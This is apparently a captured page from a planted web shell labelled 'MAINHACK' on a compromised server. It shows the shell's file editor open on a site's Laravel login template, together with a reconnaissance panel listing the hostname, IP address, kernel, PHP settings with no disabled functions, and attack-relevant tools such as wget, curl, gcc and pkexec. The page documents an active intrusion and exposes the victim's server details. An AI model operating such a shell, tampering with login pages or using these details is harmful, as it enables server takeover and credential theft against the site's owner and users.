[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: 55feeb108b308934509091c32bc92b29.php
<?php $__env->startSection('content'); ?> <div class="container"> <div class="row justify-content-center"> <div class="col-md-5"> <div class="card card-signin p-3 my-5"> <div class="card-body"> <img class="logo" src="<?php echo e(get_logo()); ?>"> <h5 class="text-center py-4"><?php echo e(_lang('Login To Your Account')); ?></h4> <?php if(Session::has('error')): ?> <div class="alert alert-danger text-center"> <strong><?php echo e(session('error')); ?></strong> </div> <?php endif; ?> <?php if(Session::has('registration_success')): ?> <div class="alert alert-success text-center"> <strong><?php echo e(session('registration_success')); ?></strong> </div> <?php endif; ?> <?php if(Session::has('success')): ?> <div class="alert alert-success text-center"> <strong><?php echo e(session('success')); ?></strong> </div> <?php endif; ?> <form method="POST" class="form-signin" action="<?php echo e(route('login')); ?>"> <?php echo csrf_field(); ?> <div class="form-group row"> <div class="col-md-12"> <input id="email" type="email" class="form-control<?php echo e($errors->has('email') ? ' is-invalid' : ''); ?>" name="email" value="<?php echo e(old('email')); ?>" placeholder="<?php echo e(_lang('Email')); ?>" required autofocus> <?php if($errors->has('email')): ?> <span class="invalid-feedback"> <strong><?php echo e($errors->first('email')); ?></strong> </span> <?php endif; ?> </div> </div> <div class="form-group row"> <div class="col-md-12"> <input id="password" type="password" class="form-control<?php echo e($errors->has('password') ? ' is-invalid' : ''); ?>" name="password" placeholder="<?php echo e(_lang('Password')); ?>" autocomplete="" required> <?php if($errors->has('password')): ?> <span class="invalid-feedback"> <strong><?php echo e($errors->first('password')); ?></strong> </span> <?php endif; ?> </div> </div> <div class="form-group row"> <div class="col-md-12"> <input type="hidden" name="g-recaptcha-response" id="recaptcha"> <?php if($errors->has('g-recaptcha-response')): ?> <span class="invalid-feedback"> <strong><?php echo e($errors->first('g-recaptcha-response')); ?></strong> </span> <?php endif; ?> </div> </div> <div class="text-center"> <div class="custom-control custom-checkbox mb-3"> <input type="checkbox" name="remember" class="custom-control-input" id="remember" <?php echo e(old('remember') ? 'checked' : ''); ?>> <label class="custom-control-label" for="remember"><?php echo e(_lang('Remember Me')); ?></label> </div> </div> <div class="form-group row mb-0"> <div class="col-md-12"> <button type="submit" class="btn btn-primary btn-block"> <?php echo e(_lang('Login')); ?> </button> <?php if(get_option('member_signup') == 1): ?> <a href="<?php echo e(route('register')); ?>" class="btn btn-link btn-register"><?php echo e(_lang('Create Account')); ?></a> <?php endif; ?> </div> </div> <div class="form-group row mt-3"> <div class="col-md-12"> <a class="btn-link" href="<?php echo e(route('password.request')); ?>"> <?php echo e(_lang('Forgot Password?')); ?> </a> </div> </div> </form> </div> </div> </div> </div> </div> <?php if(get_option('enable_recaptcha', 0) == 1): ?> <script src="https://www.google.com/recaptcha/api.js?render=<?php echo e(get_option('recaptcha_site_key')); ?>"></script> <script> grecaptcha.ready(function() { grecaptcha.execute('<?php echo e(get_option('recaptcha_site_key')); ?>', {action: 'login'}).then(function(token) { if (token) { document.getElementById('recaptcha').value = token; } }); }); </script> <?php endif; ?> <?php $__env->stopSection(); ?> <?php echo $__env->make('layouts.auth', \Illuminate\Support\Arr::except(get_defined_vars(), ['__data', '__path']))->render(); ?><?php /**PATH /home/eliosofonline/acc.eliosof.com/resources/views/auth/login.blade.php ENDPATH**/ ?>
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server1.winmanyltd.com
Server IP: 203.161.60.52
PHP Version: 8.3.27
Server Software: Apache
System: Linux server1.winmanyltd.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
HDD Total: 117.98 GB
HDD Free: 59.83 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
Yes
git:
Yes
User Info
Username: eliosofonline
User ID (UID): 1002
Group ID (GID): 1003
Script Owner UID: 1002
Current Dir Owner: 1002